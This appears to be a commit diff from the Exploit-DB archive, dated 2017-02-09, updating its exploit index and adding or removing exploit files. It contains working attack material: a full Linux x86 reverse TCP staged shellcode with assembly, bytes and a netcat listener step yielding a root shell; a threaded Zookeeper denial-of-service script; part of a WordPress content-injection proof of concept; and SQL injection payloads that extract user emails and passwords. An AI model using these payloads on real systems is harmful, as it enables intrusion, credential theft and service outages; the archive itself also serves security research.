DB: 2017-02-09

3 new exploits

Zookeeper 3.5.2 - Denial of Service

Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)

YapBB 1.2 - (forumID) Blind SQL Injection
YapBB 1.2 - 'forumID' Parameter Blind SQL Injection

ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD
ClearBudget 0.6.1 - Insecure Database Download

phpYabs 0.1.2 - (Azione) Remote File Inclusion
phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion

IF-CMS 2.0 - 'frame.php id' Blind SQL Injection
IF-CMS 2.0 - 'id' Parameter Blind SQL Injection
BusinessSpace 1.2 - 'id' SQL Injection
A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection
BusinessSpace 1.2 - 'id' Parameter SQL Injection
A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection

FlexCMS - (catId) SQL Injection
FlexCMS 2.5 - 'catId' Parameter SQL Injection
Thyme 1.3 - (export_to) Local File Inclusion
Papoo CMS 3.x - (pfadhier) Local File Inclusion
q-news 2.0 - Remote Command Execution
Potato News 1.0.0 - (user) Local File Inclusion
Thyme 1.3 - 'export_to' Parameter Local File Inclusion
Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion
Q-News 2.0 - Remote Command Execution
Potato News 1.0.0 - Local File Inclusion

Mynews 0_10 - Authentication Bypass
Mynews 0.10 - Authentication Bypass
Muviko Video CMS - SQL Injection
Multi Outlets POS 3.1 - 'id' Parameter SQL Injection

files.csv

@@ -5359,7 +5359,6 @@ id,file,description,date,author,platform,type,port
 41219,platforms/hardware/dos/41219.txt,"QNAP NVR/NAS - Buffer Overflow",2017-02-01,bashis,hardware,dos,0
 41222,platforms/windows/dos/41222.py,"Microsoft Windows 10 - SMBv3 Tree Connect (PoC)",2017-02-01,"laurent gaffie",windows,dos,0
 41232,platforms/android/dos/41232.txt,"Google Android - 'rkp_set_init_page_ro' RKP Memory Corruption",2017-02-02,"Google Security Research",android,dos,0
-41277,platforms/linux/dos/41277.py,"Zookeeper 3.5.2 - Denial of Service",2017-02-07,"Brandon Dennis",linux,dos,0
 41278,platforms/openbsd/dos/41278.txt,"OpenBSD HTTPd < 6.0 - Memory Exhaustion Denial of Service",2017-02-07,PierreKimSec,openbsd,dos,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
@@ -15876,6 +15875,7 @@ id,file,description,date,author,platform,type,port
 41174,platforms/lin_x86-64/shellcode/41174.nasm,"Linux/x86_64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",lin_x86-64,shellcode,0
 41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
 41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
+41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -20682,12 +20682,12 @@ id,file,description,date,author,platform,type,port
 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - 'bbcode.php l' Local File Inclusion",2009-02-04,Osirys,php,webapps,0
 7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
 7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
-7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
+7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - 'forumID' Parameter Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
 7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
-7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
+7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - Insecure Database Download",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
 7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0
@@ -20696,29 +20696,29 @@ id,file,description,date,author,platform,type,port
 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'catid' Parameter SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution",2009-02-06,x0r,php,webapps,0
-8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
+8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - 'Azione' Parameter Remote File Inclusion",2009-02-06,Arka69,php,webapps,0
 8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0
-8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'frame.php id' Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
+8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - 'id' Parameter Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0
 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - Multiple Vulnerabilities",2009-02-09,DNX,php,webapps,0
-8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' SQL Injection",2009-02-09,K-159,php,webapps,0
-8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' SQL Injection",2009-02-09,BackDoor,php,webapps,0
+8011,platforms/php/webapps/8011.txt,"BusinessSpace 1.2 - 'id' Parameter SQL Injection",2009-02-09,K-159,php,webapps,0
+8012,platforms/php/webapps/8012.txt,"A Better Member-Based ASP Photo Gallery - 'entry' Parameter SQL Injection",2009-02-09,BackDoor,php,webapps,0
 8014,platforms/php/webapps/8014.pl,"PHP Director 0.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8015,platforms/php/webapps/8015.pl,"Hedgehog-CMS 1.21 - Remote Command Execution",2009-02-09,darkjoker,php,webapps,0
 8016,platforms/php/webapps/8016.txt,"AdaptCMS Lite 1.4 - Cross-Site Scripting / Remote File Inclusion",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
 8017,platforms/php/webapps/8017.txt,"SnippetMaster Webpage Editor 2.2.2 - Remote File Inclusion / Cross-Site Scripting",2009-02-09,RoMaNcYxHaCkEr,php,webapps,0
-8018,platforms/php/webapps/8018.txt,"FlexCMS - (catId) SQL Injection",2009-02-09,MisterRichard,php,webapps,0
+8018,platforms/php/webapps/8018.txt,"FlexCMS 2.5 - 'catId' Parameter SQL Injection",2009-02-09,MisterRichard,php,webapps,0
 8019,platforms/php/webapps/8019.txt,"ZeroBoardXE 1.1.5 (09.01.22) - Cross-Site Scripting",2009-02-09,make0day,php,webapps,0
 8020,platforms/php/webapps/8020.txt,"Yet Another NOCC 0.1.0 - Local File Inclusion",2009-02-09,Kacper,php,webapps,0
 8025,platforms/php/webapps/8025.txt,"webframe 0.76 - Multiple File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8026,platforms/php/webapps/8026.txt,"WB News 2.1.1 - config[installdir] Remote File Inclusion",2009-02-09,ahmadbady,php,webapps,0
 8027,platforms/php/webapps/8027.txt,"Gaeste 1.6 - 'gastbuch.php' Remote File Disclosure",2009-02-09,bd0rk,php,webapps,0
 8028,platforms/php/webapps/8028.pl,"Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution",2009-02-09,Osirys,php,webapps,0
-8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - (export_to) Local File Inclusion",2009-02-10,cheverok,php,webapps,0
-8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - (pfadhier) Local File Inclusion",2009-02-10,SirGod,php,webapps,0
-8031,platforms/php/webapps/8031.pph,"q-news 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
-8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - (user) Local File Inclusion",2009-02-10,x0r,php,webapps,0
+8029,platforms/php/webapps/8029.txt,"Thyme 1.3 - 'export_to' Parameter Local File Inclusion",2009-02-10,cheverok,php,webapps,0
+8030,platforms/php/webapps/8030.txt,"Papoo CMS 3.x - 'pfadhier' Parameter Local File Inclusion",2009-02-10,SirGod,php,webapps,0
+8031,platforms/php/webapps/8031.pph,"Q-News 2.0 - Remote Command Execution",2009-02-10,Fireshot,php,webapps,0
+8032,platforms/php/webapps/8032.txt,"Potato News 1.0.0 - Local File Inclusion",2009-02-10,x0r,php,webapps,0
 8033,platforms/php/webapps/8033.txt,"AuthPhp 1.0 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
-8034,platforms/php/webapps/8034.txt,"Mynews 0_10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
+8034,platforms/php/webapps/8034.txt,"Mynews 0.10 - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release - Authentication Bypass",2009-02-10,x0r,php,webapps,0
 8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 - File Disclosure / SQL Injection / Command Execution",2009-02-10,Osirys,php,webapps,0
 8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 - (jumpUrl) Remote File Disclosure",2009-02-10,Lolek,php,webapps,0
@@ -37201,3 +37201,5 @@ id,file,description,date,author,platform,type,port
 41270,platforms/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41271,platforms/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",php,webapps,0
 41272,platforms/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",php,webapps,0
+41279,platforms/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0
+41280,platforms/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' Parameter SQL Injection",2017-02-08,"Ihsan Sencan",php,webapps,0

platforms/lin_x86/shellcode/41282.nasm

@@ -0,0 +1,198 @@
+########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
+			########### Author: Snir Levi, Applitects #############
+					## 103 Bytes ##
+
+date: 9.2.17
+Automatic python shellcode handler (with stage preset send) will be ready soon:
+https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/
+
+
+IP - 	127.0.0.1
+PORT - 	4444						
+						
+#### Stage Alphanumeric shellcode: #####
+Stage 1:
+dup2 stdin syscall:
+
+WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W	push edi
+X	pop eax
+W	push edi
+[	pop ebx
+j?	push 0x3f
+X	pop eax
+V	push esi
+[	pop ebx
+W	push edi
+Y	pop ecx
+P	push eax
+X	pop eax
+P	push eax
+X	pop EAX
+
+Stage 2:
+dup2 stdout syscall:
+
+WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+
+W	push edi
+X	pop eax
+W	push edi
+[	pop ebx
+j?      push 0x3f
+X       pop eax
+V       push esi
+[       pop ebx
+W       push edi
+Y       pop ecx
+A	inc ecx (ecx =1)
+P       push eax
+X       pop eax
+P       push eax
+
+Stage 3:
+dup2 stderr syscall:
+
+WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+
+W	push edi
+X	pop eax
+W	push edi
+[	pop ebx
+j?      push 0x3f
+X       pop eax
+V       push esi
+[       pop ebx
+W       push edi
+Y       pop ecx
+A*2     inc ecx (ecx = 2)
+P       push eax
+X       pop eax
+A       inc ecx
+
+Stage 3:
+execve /bin/sh:
+
+j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+
+j0		push 0x30
+X		pop eax
+H*32		dec eax //eax = 0x0b
+W		push edi
+Y		pop ecx
+W		push edi
+Z		pop edx
+W		push edi // null terminator
+h//sh		push 0x68732f2f //sh
+h/bin		push 0x6e69622f /bin
+T		push esp
+[		pop ebx
+
+Usage: Victim Executes the shellcode, and opens tcp connection 
+
+Stage:
+		After Connection is established, send the 4 stages ***separately***
+		
+		nc -lvp 4444
+		connect to [127.0.0.1] from localhost [127.0.0.1] (port)
+		WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+		WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
+		WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
+		j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
+		
+		whoami
+		root
+		id
+		uid=0(root) gid=0(root) groups=0(root)
+
+		
+global _start
+
+
+_start:
+
+        ; sock = socket(AF_INET, SOCK_STREAM, 0)
+        ; AF_INET = 2
+        ; SOCK_STREAM = 1
+        ; syscall number 102 - socketcall
+	; socket = 0x01
+
+	xor eax,eax
+	xor esi,esi
+	push eax
+	pop edi
+	push eax
+	mov al, 0x66
+	push byte 0x1
+	pop ebx
+	push byte ebx
+	push byte 0x2
+	mov ecx, esp
+	int 0x80
+
+	xchg esi, eax;  save sock result
+
+	; server.sin_family = AF_INET
+        ; server.sin_port = htons(PORT)
+        ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
+
+	push byte 0x1
+	pop edx
+	shl edx, 24
+	mov dl, 0x7f	;edx = 127.0.0.1 (hex)
+	push edx
+	push word 0x5c11 ;port 4444
+	push word 0x02
+
+        ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
+
+	mov al, 0x66
+	mov bl, 0x3
+	mov ecx, esp
+	push byte 0x10
+	push ecx
+	push esi
+	mov ecx ,esp
+	int 0x80
+
+
+stageAddress:		;saves stage address to edx
+        mov edx, [esp]
+	sub bl,3
+	jnz stage
+
+call near stageAddress 
+
+	;recv(int sockfd, void *buf, size_t len, int flags);
+
+stage:
+	mov al, 0x66
+	mov bl, 10
+	push edi
+	push word 100   ; buffer size
+	push edi
+	push esi	; socketfd
+	mov [esp+4],esp ; sets esp as recv buffer
+	mov ecx,esp
+	int 0x80
+        mov al, 0xcd
+        mov ah, 0x80 ; eax = int 0x80
+        mov bl, 0xFF
+        mov bh, 0xE2 ; ebx = jmp edx
+        mov [esp+57],al
+        mov [esp+58],ah
+        mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
+	jmp esp
+
+
+
+unsigned char[] = "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
+\x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
+\x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
+\xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
+\xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
+\xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
+\x89\x5c\x24\x3b\xff\xe4"
+
+

platforms/linux/dos/41277.py

@@ -1,86 +0,0 @@
-#!/usr/bin/python
-
-# Exploit Title: Zookeeper Client Denial Of Service (Port 2181)
-# Date: 2/7/2017
-# Exploit Author: Brandon Dennis
-# Email: bdennis@mail.hodges.edu
-# Software Link: http://zookeeper.apache.org/releases.html#download
-# Zookeeper Version: 3.5.2
-# Tested on: Windows 2008 R2, Windows 2012 R2 x64 & x86
-# Description: The wchp command to the ZK port 2181 will gather open internal files by each session/watcher and organize them for the requesting client. 
-#	This command is CPU intensive and will cause a denial of service to the port as well as spike the CPU of the remote machine to 90-100% consistently before any other traffic. 
-#	The average amount of threads uses was 10000 for testing. This should work on all 3.x+ versions of Zookeeper.
-#	This should effect Linux x86 & x64 as well
-
-
-
-import time
-import os
-import threading
-import sys
-import socket
-
-numOfThreads = 1
-exitStr = "n"
-stop_threads = False
-threads = []
-ipAddress = "192.168.1.5" #Change this
-port = 2181
-
-def sendCommand(ipAddress, port):
-	try:
-		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-		s.connect((ipAddress, port))
-		s.send("wchp\r".encode("utf-8"))
-		s.recv(1024)
-		s.send("wchc\r".encode("utf-8"))
-		s.close()
-	except:
-		pass
-
-	
-def runCMD(id, stop, ipAddress, port):
-	while True:
-		sendCommand(ipAddress, port)
-		if stop():
-			break
-	return
-	
-def welcomeBanner():
-	banner = """ _______   __  _____               _               
-|___  | | / / /  __ \             | |              
-   / /| |/ /  | /  \/_ __ __ _ ___| |__   ___ _ __ 
-  / / |    \  | |   | '__/ _` / __| '_ \ / _ | '__|
-./ /__| |\  \ | \__/| | | (_| \__ | | | |  __| |   
-\_____\_| \_/  \____|_|  \__,_|___|_| |_|\___|_|   
-                                                   
-                 By: Brandon Dennis 
-		 Email: bdennis@mail.hodges.edu
-				 """
-	print(banner)
-	
-
-welcomeBanner()
-numOfThreads = int(input("How many threads do you want to use: "))
-print ("Startin Up Threads...")	
-for i in range(numOfThreads):
-	t = threading.Thread(target=runCMD, args=(id, lambda: stop_threads, ipAddress, port))
-	threads.append(t)
-	t.start()
-print("Threads are now started...")
-	
-
-while exitStr != "y":
-	inpt = input("Do you wish to stop threads(y): ")
-	
-	if inpt == "y":
-		exitStr = "y"
-
-print("\nStopping Threads...")
-stop_threads = True		
-for thread in threads:
-	thread.join()
-		
-print("Threads are now stopped...")
-sys.exit(0);
-

platforms/linux/webapps/41223.py

@@ -1,14 +1,3 @@
-# Exploit Title: Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
-# Date: 2017-02-02
-# Exploit Author: @leonjza
-# Vendor Homepage: https://wordpress.org/
-# Software Link: https://wordpress.org/wordpress-4.7.zip
-# Version: Wordpress 4.7.0/4.7.1
-# Tested on: Debian Jessie
-#
-# PoC gist: https://gist.github.com/leonjza/2244eb15510a0687ed93160c623762ab
-#
-
 # 2017 - @leonjza
 #
 # Wordpress 4.7.0/4.7.1 Unauthenticated Content Injection PoC
@@ -61,7 +50,7 @@ def get_posts(api_base):
     posts = json.loads(respone.read())
 
     for post in posts:
-        print(' - Post ID: {}, Title: {}, Url: {}'
+        print(' - Post ID: {0}, Title: {1}, Url: {2}'
               .format(post['id'], post['title']['rendered'], post['link']))
 
 
@@ -76,11 +65,11 @@ def update_post(api_base, post_id, post_content):
     req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
     response = urllib2.urlopen(req).read()
 
-    print('* Post updated. Check it out at {}'.format(json.loads(response)['link']))
+    print('* Post updated. Check it out at {0}'.format(json.loads(response)['link']))
 
 
 def print_usage():
-    print('Usage: {} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
+    print('Usage: {0} <url> (optional: <post_id> <file with post_content>)'.format(__file__))
 
 
 if __name__ == '__main__':
@@ -98,7 +87,7 @@ if __name__ == '__main__':
 
     print('* Discovering API Endpoint')
     api_url = get_api_url(sys.argv[1])
-    print('* API lives at: {}'.format(api_url))
+    print('* API lives at: {0}'.format(api_url))
 
     # if we only have a url, show the posts we have have
     if len(sys.argv) < 3:
@@ -108,7 +97,7 @@ if __name__ == '__main__':
         sys.exit(0)
 
     # if we get here, we have what we need to update a post!
-    print('* Updating post {}'.format(sys.argv[2]))
+    print('* Updating post {0}'.format(sys.argv[2]))
     with open(sys.argv[3], 'r') as content:
         new_content = content.readlines()
 

platforms/php/webapps/41279.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Muviko Video CMS Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.02.2017
+# Vendor Homepage: https://muvikoscript.com/
+# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086
+# Demo: https://demo.muvikoscript.com/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/search.php?q=[SQL]
+# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
+# http://localhost/[PATH]/category.php?id=[SQL]
+# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
+# Etc...
+# # # # #

platforms/php/webapps/41280.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Point of Sales - Multi Outlets POS v3.1 Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.02.2017
+# Vendor Homepage: http://prosoft-apps.com/
+# Software Buy: https://codecanyon.net/item/point-of-sales-multi-outlets-pos/17674742
+# Demo: http://pos.prosoft-apps.com/pos/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/view_invoice?id=[SQL]
+# Etc...
+# # # # #